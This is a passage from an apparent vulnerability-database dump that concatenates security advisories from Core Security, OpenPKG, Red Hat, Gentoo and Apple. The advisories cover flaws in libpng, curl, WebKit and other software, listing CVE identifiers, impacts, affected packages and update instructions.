Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I
teV3ahcSAUFEtsaRCeXVuN8=
=u35s
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
____________________________________________________________________________
Publisher Name: OpenPKG GmbH
Publisher Home: http://openpkg.com/
Advisory Id (public): OpenPKG-SA-2007.013
Advisory Type: OpenPKG Security Advisory (SA)
Advisory Directory: http://openpkg.com/go/OpenPKG-SA
Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.013
Advisory Published: 2007-05-17 22:31 UTC
Issue Id (internal): OpenPKG-SI-20070517.02
Issue First Created: 2007-05-17
Issue Last Modified: 2007-05-17
Issue Revision: 03
____________________________________________________________________________
Subject Name: png
Subject Summary: Portable Network Graphics (PNG) Image Format
Library
Subject Home: http://www.libpng.org/pub/png/libpng.html
Subject Versions: * <= 1.2.16
Vulnerability Id: CVE-2007-2445
Vulnerability Scope: global (not OpenPKG specific)
Attack Feasibility: run-time
Attack Vector: remote network
Attack Impact: denial of service
Description:
As confirmed by the vendor, a Denial of Service (DoS) vulnerability
exists in the PNG [0] image format library libpng [1]. The bug is
a NULL-pointer-dereference vulnerability involving palette images
with a malformed "tRNS" PNG chunk, i.e., one with a bad CRC value.
This bug can, at a minimum, cause crashes in applications simply by
displaying a malformed image.
References:
[0] http://www.libpng.org/pub/png/
[1] http://www.libpng.org/pub/png/libpng.html
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445
____________________________________________________________________________
Primary Package Name: png
Primary Package Home: http://openpkg.org/go/package/png
Corrected Distribution: Corrected Branch: Corrected Package:
OpenPKG Enterprise E1.0-SOLID ghostscript-8.54-E1.0.1
OpenPKG Enterprise E1.0-SOLID png-1.2.12-E1.0.2
OpenPKG Community CURRENT ghostscript-8.57-20070516
OpenPKG Community CURRENT png-1.2.18-20070516
____________________________________________________________________________
For security reasons, this document was digitally signed with the
OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34)
which you can download from http://openpkg.com/openpkg.com.pgp
or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/.
Follow the instructions at http://openpkg.com/security/signatures/
for more details on how to verify the integrity of this document |
|
var-202108-2221
|
curl supports the `-t` command line option, known as `CURLOPT_TELNETOPTIONS`in libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending `NEW_ENV` variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theserver. Therefore potentially revealing sensitive internal information to theserver using a clear-text network protocol.This could happen because curl did not call and use sscanf() correctly whenparsing the string provided by the application. Bugs fixed (https://bugzilla.redhat.com/):
1944888 - CVE-2021-21409 netty: Request smuggling via content-length header
2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way
2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
5. JIRA issues fixed (https://issues.jboss.org/):
LOG-1971 - Applying cluster state is causing elasticsearch to hit an issue and become unusable
6. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: curl security and bug fix update
Advisory ID: RHSA-2021:4511-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:4511
Issue date: 2021-11-09
CVE Names: CVE-2021-22876 CVE-2021-22898 CVE-2021-22925
====================================================================
1. Summary:
An update for curl is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
The curl packages provide the libcurl library and the curl utility for
downloading files from servers using various protocols, including HTTP,
FTP, and LDAP.
Security Fix(es):
* curl: Leak of authentication credentials in URL via automatic Referer
(CVE-2021-22876)
* curl: TELNET stack contents disclosure (CVE-2021-22898)
* curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure
(CVE-2021-22925)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.5 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer
1947493 - Why there is a difference between curl --head output on the RHEL7 and RHEL8.
1964887 - CVE-2021-22898 curl: TELNET stack contents disclosure
1970902 - CVE-2021-22925 curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure
6. Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
curl-7.61.1-22.el8.src.rpm
aarch64:
curl-7.61.1-22.el8.aarch64.rpm
curl-debuginfo-7.61.1-22.el8.aarch64.rpm
curl-debugsource-7.61.1-22.el8.aarch64.rpm
curl-minimal-debuginfo-7.61.1-22.el8.aarch64.rpm
libcurl-7.61.1-22.el8.aarch64.rpm
libcurl-debuginfo-7.61.1-22.el8.aarch64.rpm
libcurl-devel-7.61.1-22.el8.aarch64.rpm
libcurl-minimal-7.61.1-22.el8.aarch64.rpm
libcurl-minimal-debuginfo-7.61.1-22.el8.aarch64.rpm
ppc64le:
curl-7.61.1-22.el8.ppc64le.rpm
curl-debuginfo-7.61.1-22.el8.ppc64le.rpm
curl-debugsource-7.61.1-22.el8.ppc64le.rpm
curl-minimal-debuginfo-7.61.1-22.el8.ppc64le.rpm
libcurl-7.61.1-22.el8.ppc64le.rpm
libcurl-debuginfo-7.61.1-22.el8.ppc64le.rpm
libcurl-devel-7.61.1-22.el8.ppc64le.rpm
libcurl-minimal-7.61.1-22.el8.ppc64le.rpm
libcurl-minimal-debuginfo-7.61.1-22.el8.ppc64le.rpm
s390x:
curl-7.61.1-22.el8.s390x.rpm
curl-debuginfo-7.61.1-22.el8.s390x.rpm
curl-debugsource-7.61.1-22.el8.s390x.rpm
curl-minimal-debuginfo-7.61.1-22.el8.s390x.rpm
libcurl-7.61.1-22.el8.s390x.rpm
libcurl-debuginfo-7.61.1-22.el8.s390x.rpm
libcurl-devel-7.61.1-22.el8.s390x.rpm
libcurl-minimal-7.61.1-22.el8.s390x.rpm
libcurl-minimal-debuginfo-7.61.1-22.el8.s390x.rpm
x86_64:
curl-7.61.1-22.el8.x86_64.rpm
curl-debuginfo-7.61.1-22.el8.i686.rpm
curl-debuginfo-7.61.1-22.el8.x86_64.rpm
curl-debugsource-7.61.1-22.el8.i686.rpm
curl-debugsource-7.61.1-22.el8.x86_64.rpm
curl-minimal-debuginfo-7.61.1-22.el8.i686.rpm
curl-minimal-debuginfo-7.61.1-22.el8.x86_64.rpm
libcurl-7.61.1-22.el8.i686.rpm
libcurl-7.61.1-22.el8.x86_64.rpm
libcurl-debuginfo-7.61.1-22.el8.i686.rpm
libcurl-debuginfo-7.61.1-22.el8.x86_64.rpm
libcurl-devel-7.61.1-22.el8.i686.rpm
libcurl-devel-7.61.1-22.el8.x86_64.rpm
libcurl-minimal-7.61.1-22.el8.i686.rpm
libcurl-minimal-7.61.1-22.el8.x86_64.rpm
libcurl-minimal-debuginfo-7.61.1-22.el8.i686.rpm
libcurl-minimal-debuginfo-7.61.1-22.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2021-22876
https://access.redhat.com/security/cve/CVE-2021-22898
https://access.redhat.com/security/cve/CVE-2021-22925
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYYrePtzjgjWX9erEAQi1vg/+NwMM5Xa95S/32eA64QYnxTQcWSn6wyzC
wHAIvXVu4L9kZrLqCm2zeO6US0KFZ6tCEgjamDjgO+9b1mYso3b3R2DDTbWtq4i+
gsbCths+Bqhn45Qsk9kQdhznS/MF+tWeNK06KnkJ02NmgxcuISWLQirx32Xc230e
Hs0P9TarBo04m+6HDC7CeloD8rkqpQJ4nJhX8hujaEUbukSPlkizyT/IlWTAFR9l
GLZfIkFpifNqtQzn9j6dxcefXq0BcMfAMsSbRsh7E0oJGi9x79ySEO+r5b4dlsqK
30PfEJxjrFZN3TuqzbG7pfdpKRRmUzdXCHpxb5MxXrkeD7xuzPomrorKayUIQi6g
YhESs4khV+i+6zqCNHpYdBcDbxuiYJ1w80kg/31YC7u7YEI4IlMISzw7CctzQEhk
+SqVOVKxI8Rn7OZSzb3cR6LubmR1UihMblYHHgaJ9mA7r9zAC7evddzhkxMtQ42P
81V3u0YaZKxWAy8d/brDz2YS/1Y7nnGsjNUaRZxTlWxbcjSz2cf/DPu8A5IiHS6T
M/OA8MBC4mFkQkBf4v5PKWBZe6K+gEfmJzfjlQ8nTFhYhHwNtC1z8tMP42ugNGYY
ejAfwtZ5Tw3AnuOBeb+bm148KSd/W1UPSUyJh6IrgwzMbkfDNKmKy+7gaIXZ3otd
clmEcx7lYW4=7Kqb
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. Summary:
The Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate
Kubernetes resources, persistent volume data, and internal container images
between OpenShift Container Platform clusters, using the MTC web console or
the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic
5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202212-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: curl: Multiple Vulnerabilities
Date: December 19, 2022
Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365
ID: 202212-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been found in curl, the worst of which
could result in arbitrary code execution.
Background
=========
A command line tool and library for transferring data with URLs.
Affected packages
================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
==========
Multiple vulnerabilities have been discovered in curl. Please review the
CVE identifiers referenced below for details.
Impact
=====
Please review the referenced CVE identifiers for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All curl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
=========
[ 1 ] CVE-2021-22922
https://nvd.nist.gov/vuln/detail/CVE-2021-22922
[ 2 ] CVE-2021-22923
https://nvd.nist.gov/vuln/detail/CVE-2021-22923
[ 3 ] CVE-2021-22925
https://nvd.nist.gov/vuln/detail/CVE-2021-22925
[ 4 ] CVE-2021-22926
https://nvd.nist.gov/vuln/detail/CVE-2021-22926
[ 5 ] CVE-2021-22945
https://nvd.nist.gov/vuln/detail/CVE-2021-22945
[ 6 ] CVE-2021-22946
https://nvd.nist.gov/vuln/detail/CVE-2021-22946
[ 7 ] CVE-2021-22947
https://nvd.nist.gov/vuln/detail/CVE-2021-22947
[ 8 ] CVE-2022-22576
https://nvd.nist.gov/vuln/detail/CVE-2022-22576
[ 9 ] CVE-2022-27774
https://nvd.nist.gov/vuln/detail/CVE-2022-27774
[ 10 ] CVE-2022-27775
https://nvd.nist.gov/vuln/detail/CVE-2022-27775
[ 11 ] CVE-2022-27776
https://nvd.nist.gov/vuln/detail/CVE-2022-27776
[ 12 ] CVE-2022-27779
https://nvd.nist.gov/vuln/detail/CVE-2022-27779
[ 13 ] CVE-2022-27780
https://nvd.nist.gov/vuln/detail/CVE-2022-27780
[ 14 ] CVE-2022-27781
https://nvd.nist.gov/vuln/detail/CVE-2022-27781
[ 15 ] CVE-2022-27782
https://nvd.nist.gov/vuln/detail/CVE-2022-27782
[ 16 ] CVE-2022-30115
https://nvd.nist.gov/vuln/detail/CVE-2022-30115
[ 17 ] CVE-2022-32205
https://nvd.nist.gov/vuln/detail/CVE-2022-32205
[ 18 ] CVE-2022-32206
https://nvd.nist.gov/vuln/detail/CVE-2022-32206
[ 19 ] CVE-2022-32207
https://nvd.nist.gov/vuln/detail/CVE-2022-32207
[ 20 ] CVE-2022-32208
https://nvd.nist.gov/vuln/detail/CVE-2022-32208
[ 21 ] CVE-2022-32221
https://nvd.nist.gov/vuln/detail/CVE-2022-32221
[ 22 ] CVE-2022-35252
https://nvd.nist.gov/vuln/detail/CVE-2022-35252
[ 23 ] CVE-2022-35260
https://nvd.nist.gov/vuln/detail/CVE-2022-35260
[ 24 ] CVE-2022-42915
https://nvd.nist.gov/vuln/detail/CVE-2022-42915
[ 25 ] CVE-2022-42916
https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
======
Copyright 2022 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. Summary:
Red Hat Advanced Cluster Management for Kubernetes 2.2.10 General
Availability release images, which provide one or more container updates
and bug fixes. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.10 images
Red Hat Advanced Cluster Management for Kubernetes provides the
capabilities to address common challenges that administrators and site
reliability engineers face as they work across a range of public and
private cloud environments.
Clusters and applications are all visible and managed from a single console
— with security policy built in.
This advisory contains the container images for Red Hat Advanced Cluster
Management for Kubernetes, which provide security fixes, bug fixes and
container upgrades. See the following Release Notes documentation, which
will be updated shortly for this release, for additional details about this
release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/
Security fixes:
* CVE-2021-3795 semver-regex: inefficient regular expression complexity
* CVE-2021-23440 nodejs-set-value: type confusion allows bypass of
CVE-2019-10747
Related bugs:
* RHACM 2.2.10 images (Bugzilla #2013652)
3. Bugs fixed (https://bugzilla.redhat.com/):
2004944 - CVE-2021-23440 nodejs-set-value: type confusion allows bypass of CVE-2019-10747
2006009 - CVE-2021-3795 semver-regex: inefficient regular expression complexity
2013652 - RHACM 2.2.10 images
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2021-09-20-7 Additional information for
APPLE-SA-2021-09-13-3 macOS Big Sur 11.6
macOS Big Sur 11.6 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT212804.
CoreGraphics
Available for: macOS Big Sur
Impact: Processing a maliciously crafted PDF may lead to arbitrary
code execution. Apple is aware of a report that this issue may have
been actively exploited.
Description: An integer overflow was addressed with improved input
validation.
CVE-2021-30860: The Citizen Lab
CUPS
Available for: macOS Big Sur
Impact: A local attacker may be able to elevate their privileges
Description: A permissions issue existed. This issue was addressed
with improved permission validation.
CVE-2021-30827: an anonymous researcher
Entry added September 20, 2021
CUPS
Available for: macOS Big Sur
Impact: A local user may be able to read arbitrary files as root
Description: This issue was addressed with improved checks.
CVE-2021-30828: an anonymous researcher
Entry added September 20, 2021
CUPS
Available for: macOS Big Sur
Impact: A local user may be able to execute arbitrary files
Description: A URI parsing issue was addressed with improved parsing.
CVE-2021-22925
Entry added September 20, 2021
CVMS
Available for: macOS Big Sur
Impact: A local attacker may be able to elevate their privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro
Entry added September 20, 2021
FontParser
Available for: macOS Big Sur
Impact: Processing a maliciously crafted dfont file may lead to
arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab
CVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab
CVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab
Entry added September 20, 2021
Gatekeeper
Available for: macOS Big Sur
Impact: A malicious application may bypass Gatekeeper checks
Description: This issue was addressed with improved checks.
CVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc.
Entry added September 20, 2021
ImageIO
Available for: macOS Big Sur
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: This issue was addressed with improved checks.
CVE-2021-30847: Mike Zhang of Pangu Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2021-30830: Zweig of Kunlun Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2021-30865: Zweig of Kunlun Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A race condition was addressed with improved locking.
CVE-2021-30857: Zweig of Kunlun Lab
Entry added September 20, 2021
Kernel
Available for: macOS Big Sur
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A type confusion issue was addressed with improved state
handling.
CVE-2021-30859: Apple
Entry added September 20, 2021
libexpat
Available for: macOS Big Sur
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed by updating expat to version
2.4.1.
CVE-2013-0340: an anonymous researcher
Entry added September 20, 2021
Preferences
Available for: macOS Big Sur
Impact: An application may be able to access restricted files
Description: A validation issue existed in the handling of symlinks.
This issue was addressed with improved validation of symlinks.
CVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)
of Tencent Security Xuanwu Lab (xlab.tencent.com)
Entry added September 20, 2021
Sandbox
Available for: macOS Big Sur
Impact: A user may gain access to protected parts of the file system
Description: An access issue was addressed with improved access
restrictions.
CVE-2021-30850: an anonymous researcher
Entry added September 20, 2021
SMB
Available for: macOS Big Sur
Impact: A local user may be able to read kernel memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs
Entry added September 20, 2021
SMB
Available for: macOS Big Sur
Impact: A remote attacker may be able to leak memory
Description: A logic issue was addressed with improved state
management.
CVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs
Entry added September 20, 2021
WebKit
Available for: macOS Big Sur
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Apple is aware of a report that this issue
may have been actively exploited.
Description: A use after free issue was addressed with improved
memory management.
CVE-2021-30858: an anonymous researcher
Additional recognition
APFS
We would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc.
for their assistance.
Entry added September 20, 2021
App Support
We would like to acknowledge @CodeColorist, an anonymous researcher
for their assistance.
Entry added September 20, 2021
CoreML
We would like to acknowledge hjy79425575 working with Trend Micro
Zero Day Initiative for their assistance.
Entry added September 20, 2021
CUPS
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added September 20, 2021
Kernel
We would like to acknowledge Anthony Steinhauser of Google's Safeside
project for their assistance.
Entry added September 20, 2021
Sandbox
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive
Security for their assistance.
Entry added September 20, 2021
smbx
We would like to acknowledge Zhongcheng Li (CK01) for their
assistance.
Entry added September 20, 2021
Installation note:
This update may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p
rhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY
eJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B
+CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4
5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv
4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD
t6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn
bwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu
R7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC
NlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9
4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3
85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw=
=9bjT
-----END PGP SIGNATURE-----
. Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet
1997017 - unprivileged client fails to get guest agent data
1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed
2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount
2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import
2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed
2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion
2007336 - 4.8.3 containers
2007776 - Failed to Migrate Windows VM with CDROM (readonly)
2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13
2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted
2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues
2026881 - [4.8.3] vlan-filtering is getting applied on veth ports
5 |
|
var-202203-0145
|
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.3, Safari 15.4, watchOS 8.5, iTunes 12.12.3 for Windows, iOS 15.4 and iPadOS 15.4, tvOS 15.4. Processing maliciously crafted web content may lead to arbitrary code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the WebGLMultiDraw component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-03-14-3 tvOS 15.4
tvOS 15.4 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT213186.
AppleAVD
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously crafted image may lead to heap
corruption
Description: A memory corruption issue was addressed with improved
validation.
CVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.
AVEVideoEncoder
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2022-22634: an anonymous researcher
AVEVideoEncoder
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to gain elevated privileges
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2022-22635: an anonymous researcher
AVEVideoEncoder
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2022-22636: an anonymous researcher
ImageIO
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2022-22611: Xingyu Jin of Google
ImageIO
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously crafted image may lead to heap
corruption
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2022-22612: Xingyu Jin of Google
IOGPUFamily
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to gain elevated privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2022-22641: Mohamed Ghannam (@_simo36)
Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2022-22613: Alex, an anonymous researcher
Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2022-22614: an anonymous researcher
CVE-2022-22615: an anonymous researcher
Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to elevate privileges
Description: A logic issue was addressed with improved state
management.
CVE-2022-22632: Keegan Saunders
Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An attacker in a privileged position may be able to perform a
denial of service attack
Description: A null pointer dereference was addressed with improved
validation.
CVE-2022-22638: derrek (@derrekr6)
Kernel
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
validation.
CVE-2022-22640: sqrtpwn
MediaRemote
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: An access issue was addressed with improved access
restrictions.
CVE-2022-22670: Brandon Azad
Preferences
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to read other
applications' settings
Description: The issue was addressed with additional permissions
checks.
CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)
of Tencent Security Xuanwu Lab (xlab.tencent.com)
Sandbox
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious application may be able to bypass certain Privacy
preferences
Description: The issue was addressed with improved permissions logic.
CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited,
Khiem Tran
UIKit
Available for: Apple TV 4K and Apple TV HD
Impact: A person with physical access to an iOS device may be able to
see sensitive information via keyboard suggestions
Description: This issue was addressed with improved checks.
CVE-2022-22621: Joey Hewitt
WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cookie management issue was addressed with improved
state management.
WebKit Bugzilla: 232748
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix
WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to code
execution
Description: A memory corruption issue was addressed with improved
state management.
WebKit Bugzilla: 232812
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team
WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
WebKit Bugzilla: 233172
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab
WebKit Bugzilla: 234147
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab
WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
WebKit Bugzilla: 234966
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro
Zero Day Initiative
WebKit
Available for: Apple TV 4K and Apple TV HD
Impact: A malicious website may cause unexpected cross-origin
behavior
Description: A logic issue was addressed with improved state
management.
WebKit Bugzilla: 235294
CVE-2022-22637: Tom McKee of Google
Additional recognition
Bluetooth
We would like to acknowledge an anonymous researcher for their
assistance.
Siri
We would like to acknowledge an anonymous researcher for their
assistance
syslog
We would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for
their assistance.
UIKit
We would like to acknowledge Tim Shadel of Day Logger, Inc. for their
assistance.
WebKit
We would like to acknowledge Abdullah Md Shaleh for their assistance.
WebKit Storage
We would like to acknowledge Martin Bajanik of FingerprintJS for
their assistance.
